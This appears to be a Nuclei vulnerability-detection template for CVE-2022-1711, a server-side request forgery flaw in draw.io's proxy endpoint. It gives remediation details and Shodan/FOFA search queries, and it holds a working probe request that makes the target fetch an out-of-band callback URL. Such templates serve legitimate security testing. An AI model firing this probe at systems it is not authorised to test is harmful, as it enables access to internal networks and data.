id: CVE-2022-1711

info:
  name: draw.io < 18.0.5 - Server Side Request Forgery (SSRF)
  author: ritikchaddha
  severity: high
  description: |
    Server-Side Request Forgery (SSRF) vulnerability in draw.io (also known as diagrams.net) prior to version 18.0.5 allows attackers to bypass URL validation restrictions in the ProxyServlet component. The vulnerability exists because the application does not properly validate URLs passed to its proxy endpoint, allowing attackers to make requests to internal services or external servers. This can lead to unauthorized access to internal resources and potential data exfiltration.
  impact: |
    Unauthenticated attackers can perform SSRF attacks via the proxy endpoint to access internal resources, scan internal networks, or retrieve sensitive data from internal systems.
  remediation: |
    Update to draw.io/diagrams.net version 18.0.5 or later. The patch adds isLinkLocalAddress() checks to restrict proxy request destinations. If patching is not possible, implement network controls to limit the server's connections to internal systems.
  reference:
    - https://huntr.dev/bounties/c32afff5-6ad5-4d4d-beea-f55ab4925797
    - https://github.com/jgraph/drawio/commit/cf5c78aa0f3127fb10053db55b39f3017a0654ae
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1711
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1711
    cwe-id: CWE-918
    epss-score: 0.83223
    epss-percentile: 0.99288
  metadata:
    vendor: diagrams
    product: drawio
    verified: true
    shodan-query: html:"draw.io"
    fofa-query: body="draw.io"
  tags: cve,cve2022,ssrf,drawio,diagrams,jgraph,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/proxy?url=http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(interactsh_protocol, 'dns')"
          - "contains(content_type, 'application/octet-stream')"
        condition: and
# digest: 4b0a00483046022100aacdc6fda7cea676c7147f943e98908c049261da20fe3953830d1f3d1575f9a2022100d7307e76c1e4f5cdd87fe3956cbbdd68f2d52ba70abd2a5261b9b9fbac16a30c:922c64590222798bb761d5b6d8e72950